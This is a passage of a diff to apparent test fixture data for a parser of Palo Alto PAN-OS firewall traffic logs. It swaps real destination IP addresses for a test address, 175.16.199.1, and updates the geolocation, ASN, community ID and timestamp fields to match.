States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -13360,7 +13488,7 @@ "destination": { "nat": { "port": 443, - "ip": "35.185.88.112" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", 
@@ -13382,7 +13510,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:/rmnQ6QBbJzgkfNBrkCgvu5UHiU=" + "community_id": "1:jS5fmx0Jyid6wJJzRz5/FTP7Y8s=" } }, "sequence_number": 32091192, @@ -13402,8 +13530,8 @@ ], "network": { "community_id": [ - "1:WVDXvoZNkWqELBhlp2DzAjKS6V4=", - "1:/rmnQ6QBbJzgkfNBrkCgvu5UHiU=" + "1:7eLAq1McW/s++i3m8QhCi8RWLe8=", + "1:jS5fmx0Jyid6wJJzRz5/FTP7Y8s=" ], "transport": "tcp", "application": "ssl", @@ -13443,14 +13571,14 @@ ], "ip": [ "192.168.15.224", - "35.185.88.112", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 10000000000, - "ingested": "2021-09-08T12:40:05.942147240Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,35.185.88.112,192.168.1.63,35.185.88.112,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031864200Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -13472,27 +13600,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 109, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13511,7 +13641,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -13526,7 +13656,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -13548,7 +13678,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:9Ub1pskil4C0tLo85OJa61g1D0Q=" + "community_id": "1:zKOYj65ZfonGNEeED/C8WsAzNdo=" } }, "sequence_number": 32091193, 
@@ -13568,8 +13698,8 @@ ], "network": { "community_id": [ - "1:SaW9SLCHEmuQYbHgbCLPVZmIrWo=", - "1:9Ub1pskil4C0tLo85OJa61g1D0Q=" + "1:SqvoGARqG3vB8IQsDqwWVdoya4g=", + "1:zKOYj65ZfonGNEeED/C8WsAzNdo=" ], "transport": "udp", "application": "dns", @@ -13609,14 +13739,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942151013Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031868700Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -13639,27 +13769,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 116, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13678,7 +13810,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -13693,7 +13825,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -13715,7 +13847,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:rh7nCIUBzUAekx4F+OTwBbpRh+E=" + "community_id": "1:hn4GD+5fvFkKh5CY1I/tGUl70ps=" } }, "sequence_number": 32091194, 
@@ -13735,8 +13867,8 @@ ], "network": { "community_id": [ - "1:UKGEn5x2xKPJhb0aLNUd3IM2xP0=", - "1:rh7nCIUBzUAekx4F+OTwBbpRh+E=" + "1:BnKHQDJv1OGtE9i+aGd3gRM75p8=", + "1:hn4GD+5fvFkKh5CY1I/tGUl70ps=" ], "transport": "udp", "application": "dns", @@ -13776,14 +13908,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942154637Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031874200Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -13806,27 +13938,29 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 96, - "ip": "8.8.8.8", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13845,7 +13979,7 @@ "packets": 1, "ip": "192.168.15.224" }, - "message": "192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -13860,7 +13994,7 @@ "destination": { "nat": { "port": 53, - "ip": "8.8.8.8" + "ip": "175.16.199.1" } }, "endreason": "aged-out", @@ -13882,7 +14016,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:eIIc+AXkJtZLyfNqUAVZLumaYVQ=" + "community_id": "1:MBYdQDSxHvBa6iAwYROKM5oT9cM=" } }, "sequence_number": 32091195, 
@@ -13902,8 +14036,8 @@ ], "network": { "community_id": [ - "1:7WDGZhY7X3GTZLGCIDWzxK5juF4=", - "1:eIIc+AXkJtZLyfNqUAVZLumaYVQ=" + "1:rLkKmC5eKNwFkylsF3ox4VOALUI=", + "1:MBYdQDSxHvBa6iAwYROKM5oT9cM=" ], "transport": "udp", "application": "dns", @@ -13943,14 +14077,14 @@ ], "ip": [ "192.168.15.224", - "8.8.8.8", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:40:05.942158276Z", - "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031879700Z", + "original": "Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:49.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -13973,30 +14107,29 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 654, - "ip": "50.19.85.24", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -14015,7 +14148,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -14030,7 +14163,7 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", 
@@ -14052,7 +14185,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:Mn7w9ScywW3qjDMNsO8QsGj6BY0=" + "community_id": "1:VnasDo2kW0Vvk+m83MK6dUD18cU=" } }, "sequence_number": 32091196, @@ -14072,8 +14205,8 @@ ], "network": { "community_id": [ - "1:wOhR5YstpLgnt5WE19sGYKCmyZU=", - "1:Mn7w9ScywW3qjDMNsO8QsGj6BY0=" + "1:IIgvfZp9yUTeIpQYVcYO+SM5+ew=", + "1:VnasDo2kW0Vvk+m83MK6dUD18cU=" ], "transport": "tcp", "application": "ssl", @@ -14113,14 +14246,14 @@ ], "ip": [ "192.168.15.224", - "50.19.85.24", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 11000000000, - "ingested": "2021-09-08T12:40:05.942161813Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031883500Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -14143,30 +14276,29 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 654, - "ip": "50.19.85.24", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -14185,7 +14317,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -14200,7 +14332,7 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", 
@@ -14222,7 +14354,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:8oAG19bm5FROhazDy0CcTH+Cfqc=" + "community_id": "1:llFrhbdT+Y/j+j3SqliVsUHzOlY=" } }, "sequence_number": 32091197, @@ -14242,8 +14374,8 @@ ], "network": { "community_id": [ - "1:6h8eY2s13iXP9cVx+C3Odlnn4+A=", - "1:8oAG19bm5FROhazDy0CcTH+Cfqc=" + "1:TUT+oGQJuH2lZ5R9kJQDVgzhW2Q=", + "1:llFrhbdT+Y/j+j3SqliVsUHzOlY=" ], "transport": "tcp", "application": "ssl", @@ -14283,14 +14415,14 @@ ], "ip": [ "192.168.15.224", - "50.19.85.24", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 11000000000, - "ingested": "2021-09-08T12:40:05.942165226Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031887800Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -14313,30 +14445,29 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Virginia", + "region_name": "Jilin", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 14618, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 654, - "ip": "50.19.85.24", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -14355,7 +14486,7 @@ "packets": 8, "ip": "192.168.15.224" }, - "message": "192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -14370,7 +14501,7 @@ "destination": { "nat": { "port": 443, - "ip": "50.19.85.24" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", 
@@ -14392,7 +14523,7 @@ "device_group_hierarchy3": "0", "network": { "nat": { - "community_id": "1:ZhVElLU1QcpGayhElc2L/+Rp+xw=" + "community_id": "1:BKgrW5Xif0BNG51T3hX117V7884=" } }, "sequence_number": 32091198, @@ -14412,8 +14543,8 @@ ], "network": { "community_id": [ - "1:/ZL4TDk4BgzLIyz/Xp1oJ9ew5cE=", - "1:ZhVElLU1QcpGayhElc2L/+Rp+xw=" + "1:NcHs8KnyCiMJadkNBNK4duVltbA=", + "1:BKgrW5Xif0BNG51T3hX117V7884=" ], "transport": "tcp", "application": "ssl", @@ -14453,14 +14584,14 @@ ], "ip": [ "192.168.15.224", - "50.19.85.24", + "175.16.199.1", "192.168.1.63" ] }, "event": { "duration": 11000000000, - "ingested": "2021-09-08T12:40:05.942168745Z", - "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,50.19.85.24,192.168.1.63,50.19.85.24,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "ingested": "2021-12-09T13:44:05.031893300Z", + "original": "Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "created": "2018-11-30T16:09:50.000-05:00", "timezone": "America/New_York", "kind": "event", 
@@ -14483,27 +14614,29 @@ "destination": { "nat": { "port": 443, - "ip": "104.254.150.9" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 29990, + "number": 4837, "organization": { - "name": "AppNexus, Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 7820, - "ip": "104.254.150.9", + "ip": "175.16.199.1", "packets": 10 }, "rule": { @@ -14522,7 +14655,7 @@ "packets": 12, "ip": "192.168.15.224" }, - "message": "192.168.15.224,104.254.150.9,192.168.1.63,104.254.150.9,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0", "panw": { "panos": { "device_group_hierarchy4": "0", @@ -14537,7 +14670,7 @@ "destination": { "nat": { "port": 443, - "ip": "104.254.150.9" + "ip": "175.16.199.1" } }, "endreason": "tcp-rst-from-client", 
